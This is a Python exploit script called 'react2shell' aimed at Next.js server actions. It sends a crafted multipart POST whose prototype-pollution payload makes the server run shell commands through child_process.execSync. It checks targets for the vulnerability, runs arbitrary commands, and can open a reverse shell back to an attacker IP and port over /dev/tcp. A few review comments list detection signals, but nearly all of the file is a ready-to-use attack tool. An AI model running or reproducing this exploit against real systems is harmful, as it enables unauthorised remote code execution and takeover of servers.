#!/usr/bin/env python
import http.client
import uuid
from urllib.parse import *
import argparse
import random
def generate_payload(host, shell_payload):
    """Build the HTTP headers and multipart body for the crafted POST request.

    Args:
        host: Value placed in the ``Host`` header.
        shell_payload: Command string spliced into the JavaScript string
            literal carried by form field "0".

    Returns:
        A ``(headers, body)`` tuple: ``headers`` is a dict of request
        headers, ``body`` is the multipart/form-data text with three parts
        named "0", "1" and "2".

    NOTE(review): for detection, the request built here is a POST with a
    ``Next-Action`` header whose multipart text fields contain the literals
    ``__proto__``, ``constructor:constructor`` and ``child_process``. These
    are fixed in this script; other tooling may vary them, so treat them as
    one signal rather than a complete signature.
    """
    # Fresh random multipart boundary and request ids on every call.
    boundary = str(uuid.uuid4())
    request_id = uuid.uuid4().hex[:8]
    html_request_id = uuid.uuid4().hex[:21]
    headers = {
        'Content-Type': f"multipart/form-data; boundary={boundary}",
        "Host": host,
        # The header value is the fixed placeholder 'x', not a real action id.
        'Next-Action': 'x',
        'X-Nextjs-Request-Id': request_id,
        'X-Nextjs-Html-Request-Id': html_request_id
    }
    # Three chained str.replace passes, applied in the order written:
    # single quote, double quote, then backslash.
    shell_payload = shell_payload.replace("'", "\\'") \
        .replace('"', '\\"') \
        .replace("\\", "\\\\")
    body = (
        # Part "0": JSON-like text whose "_prefix" string holds JavaScript
        # that calls child_process.execSync on the supplied command and
        # throws an Error whose digest embeds the command output in a
        # NEXT_REDIRECT path. check_vuln in this file reads that output
        # back from the "x-action-redirect" response header.
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="0"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'
        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'' + shell_payload + '\').toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n'
        '\r\n'
        # Part "1": the string "$@0", which names part "0".
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="1"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'
        '"$@0"\r\n'
        '\r\n'
        # Part "2": an empty JSON array; part "0" names it via "$Q2".
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="2"\r\n'
        'Content-Type: text/plain; charset=utf-8\r\n'
        '\r\n'
        '[]'
        '\r\n'
        f"--{boundary}--\r\n"
    )
    return headers, body
def send_request(url_s, shell_payload):
    """POST the request built by generate_payload to ``url_s``.

    Args:
        url_s: Full URL; only ``http`` and ``https`` schemes are accepted.
        shell_payload: Command string handed to generate_payload.

    Returns:
        The ``http.client.HTTPResponse``. The connection is closed before
        returning and the body is not read here; the caller in this file
        only inspects a response header.
    """
    parsed = urlparse(url_s)
    target_host = parsed.hostname
    headers, body = generate_payload(target_host, shell_payload)

    # Reject anything that is not plain HTTP or HTTPS before connecting.
    scheme = parsed.scheme
    if scheme not in ("http", "https"):
        print("Unknown scheme on url")
        exit(1)

    # Fall back to the scheme's default port when the URL gives none.
    if scheme == "https":
        conn = http.client.HTTPSConnection(target_host, parsed.port or 443)
    else:
        conn = http.client.HTTPConnection(target_host, parsed.port or 80)

    # Only the path is sent; any query string in the URL is dropped.
    conn.request("POST", parsed.path or "/", headers=headers, body=body)
    response = conn.getresponse()
    conn.close()
    return response
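def check_vuln(url):
    """Report whether ``url`` echoes back the result of an arithmetic probe.

    Two random integers in 1..100 are summed by an ``echo $((x+y))`` command
    sent through send_request; the target counts as vulnerable when the sum
    appears in the ``x-action-redirect`` response header.

    Args:
        url: Target URL passed straight to send_request.

    Returns:
        True if the expected sum is found in the header, False otherwise
        (including when the header is absent).
    """
    x, y = random.randint(1, 100), random.randint(1, 100)
    shell_payload = f"echo $(({x}+{y}))"
    res = send_request(url, shell_payload)
    # getheader() returns None when the header is missing. Treat that as
    # "not vulnerable" instead of raising TypeError on the `in` test.
    redirect = res.getheader("x-action-redirect") or ""
    # NOTE(review): this is a substring match on a short number (2..200),
    # so a header that happens to contain those digits would give a false
    # positive. Confirm a positive result by other means.
    return f"{x+y}" in redirect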
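def main():
    """Command-line entry point.

    Prints the banner, parses ``--url`` (required) plus optional ``--cmd``
    or ``--ip``/``--port``, runs check_vuln against the URL, and then sends
    at most one request through send_request. ``--cmd`` takes precedence
    over ``--ip``/``--port``. When neither is supplied the run is
    check-only and nothing further is sent.
    """
    print("d8888b. d88888b .d8b. .o88b. d888888b .d888b. .d8888. db db d88888b db db")
    print("88 `8D 88' d8' `8b d8P Y8 `~~88~~' VP `8D 88' YP 88 88 88' 88 88")
    print("88oobY' 88ooooo 88ooo88 8P 88 odD' `8bo. 88ooo88 88ooooo 88 88")
    print("88`8b 88~~~~~ 88~~~88 8b 88 .88' `Y8b. 88~~~88 88~~~~~ 88 88")
    print("88 `88. 88. 88 88 Y8b d8 88 j88. db 8D 88 88 88. 88booo. 88booo.")
    print("88 YD Y88888P YP YP `Y88P' YP 888888D `8888Y' YP YP Y88888P Y88888P Y88888P")
    print()
    parser = argparse.ArgumentParser("react2shell")
    parser.add_argument("-u", "--url", help="Target URL", type=str, required=True)
    parser.add_argument("-i", "--ip", help="Attacker IP", type=str, required=False)
    parser.add_argument("-p", "--port", help="Attacker port", type=int, required=False)
    parser.add_argument("-c", "--cmd", help="Command to execute", type=str, required=False)
    args = parser.parse_args()
    print("Checking... ", end="")
    if check_vuln(args.url):
        print("Target is VULNERABLE!")
    else:
        print("Target does not seem to be vulnerable :(")
    if args.cmd:
        if args.ip or args.port:
            print("WARNING: ip and port are ignored when the command is provided.")
        shell_payload = args.cmd
        send_request(args.url, shell_payload)
    elif args.ip and args.port:
        shell_payload = f"/bin/sh -i >& /dev/tcp/{args.ip}/{args.port} 0>&1"
        send_request(args.url, shell_payload)
    else:
        # Check-only run (or only one of --ip/--port given): no request was
        # sent after the check, so do not report that one was.
        return
    print("Payload successfully sent, check your listener.")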
# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()